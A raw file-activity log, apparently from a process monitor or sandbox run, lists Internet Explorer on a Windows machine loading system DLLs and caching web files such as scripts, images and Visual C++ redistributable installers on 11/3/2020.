11/3/2020 - 11:45:46.278Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\mshtml.tlb
11/3/2020 - 11:45:46.278Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\System32\C_20127.NLS
11/3/2020 - 11:45:46.278Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\ProgramData\Microsoft\Windows\Caches\cversions.2.dbcversions.2.db
11/3/2020 - 11:45:46.278Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\ProgramData\Microsoft\Windows\Caches\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000011.db{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000011.db
11/3/2020 - 11:45:46.278Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\ProgramData\Microsoft\Windows\Caches\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db
11/3/2020 - 11:45:46.278Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\EHQ10TF8\vcredist_x64.exe
11/3/2020 - 11:45:46.278Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4RCRTXD2\vcredist_x86.exe
11/3/2020 - 11:45:46.278Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\EHQ10TF8\style[1].cssstyle[1].css
11/3/2020 - 11:45:46.278Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\EHQ10TF8\bing-search-logo[1].pngbing-search-logo[1].png
11/3/2020 - 11:45:46.278Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4RCRTXD2\4300ae64-546c-4bbe-9026-6779b3684fb8_32[1].png4300ae64-546c-4bbe-9026-6779b3684fb8_32[1].png
11/3/2020 - 11:45:46.278Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\A6STR8JF\script[1].jsscript[1].js
11/3/2020 - 11:45:46.278Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4RCRTXD2\click-run_pt-br[1].jpgclick-run_pt-br[1].jpg
11/3/2020 - 11:45:46.278Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\A6STR8JF\script[2].jsscript[2].js
11/3/2020 - 11:45:46.278Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B398B80134F72209547439DB21AB308D_592839A8569F831D0F2306AE4BB5C24BB398B80134F72209547439DB21AB308D_592839A8569F831D0F2306AE4BB5C24B
11/3/2020 - 11:45:46.278Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B398B80134F72209547439DB21AB308D_592839A8569F831D0F2306AE4BB5C24BB398B80134F72209547439DB21AB308D_592839A8569F831D0F2306AE4BB5C24B
11/3/2020 - 11:45:46.278Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4RCRTXD2\1715500327[1].js1715500327[1].js
11/3/2020 - 11:45:46.278Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_D9817BD5013875AD517DA734753452036BADA8974A10C4BD62CC921D13E43B18_D9817BD5013875AD517DA73475345203
11/3/2020 - 11:45:46.278Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6BADA8974A10C4BD62CC921D13E43B18_D9817BD5013875AD517DA734753452036BADA8974A10C4BD62CC921D13E43B18_D9817BD5013875AD517DA73475345203
11/3/2020 - 11:45:46.278Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\NJ54RMQH\jquery-1.8.3.min[1].jsjquery-1.8.3.min[1].js
11/3/2020 - 11:45:46.278Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\DOMStore\SM4GL60W\www.microsoft[1].xmlwww.microsoft[1].xml
11/3/2020 - 11:45:46.278Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\A6STR8JF\latest[1].eotlatest[1].eot
11/3/2020 - 11:45:46.278Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\A6STR8JF\latest[2].eotlatest[2].eot
11/3/2020 - 11:45:46.278Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\Fonts\seguisb.ttf
11/3/2020 - 11:45:46.278Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\NJ54RMQH\latest[1].eotlatest[1].eot
11/3/2020 - 11:45:46.278Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\NJ54RMQH\search_icon[1].pngsearch_icon[1].png
11/3/2020 - 11:45:46.278Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\Fonts\micross.ttf
11/3/2020 - 11:45:46.278Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\EHQ10TF8\ie[1].pngie[1].png
11/3/2020 - 11:45:46.278Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\EHQ10TF8\yellow-arrow[1].pngyellow-arrow[1].png
11/3/2020 - 11:45:46.278Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\EHQ10TF8\Bing[1].pngBing[1].png
11/3/2020 - 11:45:46.278Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\EHQ10TF8\windowsupdate[1].pngwindowsupdate[1].png
11/3/2020 - 11:45:46.278Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\35DDEDF268117918D1D277A171D8DF7B_F2DE72102A14736B534BAAAB62F0BD4B35DDEDF268117918D1D277A171D8DF7B_F2DE72102A14736B534BAAAB62F0BD4B
11/3/2020 - 11:45:46.278Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\35DDEDF268117918D1D277A171D8DF7B_F2DE72102A14736B534BAAAB62F0BD4B35DDEDF268117918D1D277A171D8DF7B_F2DE72102A14736B534BAAAB62F0BD4B
11/3/2020 - 11:45:46.278Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\NJ54RMQH\xfLjhe25qYs[1].jsxfLjhe25qYs[1].js
11/3/2020 - 11:45:46.293Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Program Files (x86)\Internet Explorer\iexplore.exe
11/3/2020 - 11:45:46.372Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\System32\ntdll.dll
11/3/2020 - 11:45:46.372Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\System32\wow64.dll
11/3/2020 - 11:45:46.372Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\System32\wow64win.dll
11/3/2020 - 11:45:46.372Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\System32\wow64cpu.dll
11/3/2020 - 11:45:46.372Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\System32\kernel32.dll
11/3/2020 - 11:45:46.372Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\kernel32.dll
11/3/2020 - 11:45:46.372Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\System32\user32.dll
11/3/2020 - 11:45:46.372Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\ntdll.dll
11/3/2020 - 11:45:46.372Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\System32\apisetschema.dllapisetschema.dll
11/3/2020 - 11:45:46.372Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\KernelBase.dllKernelBase.dll
11/3/2020 - 11:45:46.372Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Program Files (x86)\Internet Explorer\iexplore.exe
11/3/2020 - 11:45:46.372Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\msvcrt.dll
11/3/2020 - 11:45:46.372Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\api-ms-win-downlevel-advapi32-l1-1-0.dllapi-ms-win-downlevel-advapi32-l1-1-0.dll
11/3/2020 - 11:45:46.372Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\advapi32.dll
11/3/2020 - 11:45:46.372Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\sechost.dll
11/3/2020 - 11:45:46.372Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\rpcrt4.dll
11/3/2020 - 11:45:46.372Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\sspicli.dll
11/3/2020 - 11:45:46.372Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\cryptbase.dllcryptbase.dll
11/3/2020 - 11:45:46.372Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\iertutil.dll
11/3/2020 - 11:45:46.372Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\api-ms-win-downlevel-version-l1-1-0.dllapi-ms-win-downlevel-version-l1-1-0.dll
11/3/2020 - 11:45:46.372Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\version.dll
11/3/2020 - 11:45:46.372Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\api-ms-win-downlevel-user32-l1-1-0.dllapi-ms-win-downlevel-user32-l1-1-0.dll
11/3/2020 - 11:45:46.372Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\user32.dll
11/3/2020 - 11:45:46.372Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\gdi32.dll
11/3/2020 - 11:45:46.372Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\lpk.dll
11/3/2020 - 11:45:46.372Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\usp10.dll
11/3/2020 - 11:45:46.372Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\api-ms-win-downlevel-normaliz-l1-1-0.dllapi-ms-win-downlevel-normaliz-l1-1-0.dll
11/3/2020 - 11:45:46.372Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\normaliz.dll
11/3/2020 - 11:45:46.372Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\api-ms-win-downlevel-shlwapi-l1-1-0.dllapi-ms-win-downlevel-shlwapi-l1-1-0.dll
11/3/2020 - 11:45:46.372Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\shlwapi.dll
11/3/2020 - 11:45:46.372Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\imm32.dll
11/3/2020 - 11:45:46.372Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\msctf.dll
11/3/2020 - 11:45:46.372Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\api-ms-win-downlevel-shell32-l1-1-0.dllapi-ms-win-downlevel-shell32-l1-1-0.dll
11/3/2020 - 11:45:46.372Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\shell32.dll
11/3/2020 - 11:45:46.372Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\ieframe.dll
11/3/2020 - 11:45:46.372Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\ole32.dll
11/3/2020 - 11:45:46.372Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\oleaut32.dll
11/3/2020 - 11:45:46.372Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_41e855142bd5705d\comctl32.dll
11/3/2020 - 11:45:46.372Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Program Files (x86)\Internet Explorer\IEShims.dll
11/3/2020 - 11:45:46.372Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\comdlg32.dll
11/3/2020 - 11:45:46.372Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\api-ms-win-downlevel-ole32-l1-1-0.dllapi-ms-win-downlevel-ole32-l1-1-0.dll
11/3/2020 - 11:45:46.372Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\uxtheme.dll
11/3/2020 - 11:45:46.372Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\wininet.dll
11/3/2020 - 11:45:46.372Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\userenv.dll
11/3/2020 - 11:45:46.372Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\profapi.dll
11/3/2020 - 11:45:46.372Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\secur32.dll
11/3/2020 - 11:45:46.372Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\api-ms-win-downlevel-advapi32-l2-1-0.dllapi-ms-win-downlevel-advapi32-l2-1-0.dll
11/3/2020 - 11:45:46.372Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\urlmon.dll
11/3/2020 - 11:45:46.372Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\ws2_32.dll
11/3/2020 - 11:45:46.372Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\nsi.dll
11/3/2020 - 11:45:46.372Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\winhttp.dll
11/3/2020 - 11:45:46.372Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\webio.dll
11/3/2020 - 11:45:46.372Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\mswsock.dll
11/3/2020 - 11:45:46.372Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\wship6.dll
11/3/2020 - 11:45:46.372Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\IPHLPAPI.DLL
11/3/2020 - 11:45:46.372Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\winnsi.dll
11/3/2020 - 11:45:46.372Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\cryptsp.dll
11/3/2020 - 11:45:46.372Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\rsaenh.dll
11/3/2020 - 11:45:46.372Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\RpcRtRemote.dllRpcRtRemote.dll
11/3/2020 - 11:45:46.372Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\clbcatq.dll
11/3/2020 - 11:45:46.372Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Program Files (x86)\Internet Explorer\ieproxy.dll
11/3/2020 - 11:45:46.372Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\api-ms-win-downlevel-shlwapi-l2-1-0.dllapi-ms-win-downlevel-shlwapi-l2-1-0.dll
11/3/2020 - 11:45:46.372Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\dwmapi.dll
11/3/2020 - 11:45:46.372Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Program Files (x86)\Internet Explorer\sqmapi.dll
11/3/2020 - 11:45:46.372Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\bcrypt.dll
11/3/2020 - 11:45:46.372Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\bcryptprimitives.dllbcryptprimitives.dll
11/3/2020 - 11:45:46.372Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\mshtml.dll
11/3/2020 - 11:45:46.372Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\d2d1.dll
11/3/2020 - 11:45:46.372Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\DWrite.dll
11/3/2020 - 11:45:46.372Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\dxgi.dll
11/3/2020 - 11:45:46.372Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\setupapi.dll
11/3/2020 - 11:45:46.372Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\cfgmgr32.dll
11/3/2020 - 11:45:46.372Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\devobj.dll
11/3/2020 - 11:45:46.372Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\wintrust.dll
11/3/2020 - 11:45:46.372Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\crypt32.dll
11/3/2020 - 11:45:46.372Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\msasn1.dll
11/3/2020 - 11:45:46.372Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\apphelp.dll
11/3/2020 - 11:45:46.372Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\mlang.dll
11/3/2020 - 11:45:46.372Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\propsys.dll
11/3/2020 - 11:45:46.372Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\dnsapi.dll
11/3/2020 - 11:45:46.372Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\WSHTCPIP.DLL
11/3/2020 - 11:45:46.372Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\rasadhlp.dll
11/3/2020 - 11:45:46.372Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\FWPUCLNT.DLL
11/3/2020 - 11:45:46.372Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\ieui.dll
11/3/2020 - 11:45:46.372Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\wshqos.dll
11/3/2020 - 11:45:46.372Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\sxs.dll
11/3/2020 - 11:45:46.372Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\credssp.dll
11/3/2020 - 11:45:46.372Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\schannel.dll
11/3/2020 - 11:45:46.372Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\ncrypt.dll
11/3/2020 - 11:45:46.372Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\gpapi.dll
11/3/2020 - 11:45:46.372Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\p2pcollab.dllp2pcollab.dll
11/3/2020 - 11:45:46.372Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\cryptnet.dll
11/3/2020 - 11:45:46.372Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\Wldap32.dll
11/3/2020 - 11:45:46.372Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\SensApi.dll
11/3/2020 - 11:45:46.372Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\netprofm.dll
11/3/2020 - 11:45:46.372Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\nlaapi.dll
11/3/2020 - 11:45:46.372Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\msimtf.dll
11/3/2020 - 11:45:46.372Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\oleacc.dll
11/3/2020 - 11:45:46.372Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\npmproxy.dll
11/3/2020 - 11:45:46.372Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\jscript9.dll
11/3/2020 - 11:45:46.372Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\WindowsCodecs.dllWindowsCodecs.dll
11/3/2020 - 11:45:46.372Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\d3d11.dll
11/3/2020 - 11:45:46.372Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\d3d10warp.dlld3d10warp.dll
11/3/2020 - 11:45:46.372Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\xmllite.dll
11/3/2020 - 11:45:46.372Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\powrprof.dll
11/3/2020 - 11:45:46.372Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\winmm.dll
11/3/2020 - 11:45:46.372Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\UIAnimation.dllUIAnimation.dll
11/3/2020 - 11:45:46.372Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\WindowsCodecsExt.dllWindowsCodecsExt.dll
11/3/2020 - 11:45:46.372Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\msxml6.dll
11/3/2020 - 11:45:46.372Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\imgutil.dll
11/3/2020 - 11:45:46.372Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\dhcpcsvc6.dlldhcpcsvc6.dll
11/3/2020 - 11:45:46.372Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\dhcpcsvc.dll
11/3/2020 - 11:45:46.372Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\psapi.dll
11/3/2020 - 11:45:46.372Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\Wpc.dll
11/3/2020 - 11:45:46.372Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\wevtapi.dll
11/3/2020 - 11:45:46.372Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\samcli.dll
11/3/2020 - 11:45:46.372Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\samlib.dll
11/3/2020 - 11:45:46.372Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\netutils.dll
11/3/2020 - 11:45:46.372Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\mfplat.dll
11/3/2020 - 11:45:46.372Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\avrt.dll
11/3/2020 - 11:45:46.372Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\mshtmlmedia.dllmshtmlmedia.dll
11/3/2020 - 11:45:46.372Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\mf.dll
11/3/2020 - 11:45:46.372Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\atl.dll
11/3/2020 - 11:45:46.372Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\ksuser.dll
11/3/2020 - 11:45:46.387Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\t2embed.dll
11/3/2020 - 11:45:46.387Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exe\Device\HarddiskVolume2
11/3/2020 - 11:45:46.387Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows
11/3/2020 - 11:45:46.387Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\System32\wow64.dll
11/3/2020 - 11:45:46.387Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\System32\wow64.dll
11/3/2020 - 11:45:46.387Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\System32\wow64win.dll
11/3/2020 - 11:45:46.387Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\System32\wow64win.dll
11/3/2020 - 11:45:46.387Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\System32\wow64cpu.dll
11/3/2020 - 11:45:46.387Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\System32\wow64cpu.dll
11/3/2020 - 11:45:46.387Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\System32\wow64log.dll
11/3/2020 - 11:45:46.387Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows
11/3/2020 - 11:45:46.387Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows
11/3/2020 - 11:45:46.387Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\Desktop
11/3/2020 - 11:45:46.387Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\sechost.dll
11/3/2020 - 11:45:46.387Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\sechost.dll
11/3/2020 - 11:45:46.387Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Program Files (x86)\Internet Explorer\version.DLL
11/3/2020 - 11:45:46.387Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\version.dll
11/3/2020 - 11:45:46.387Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\version.dll
11/3/2020 - 11:45:46.387Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\imm32.dll
11/3/2020 - 11:45:46.387Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\imm32.dll
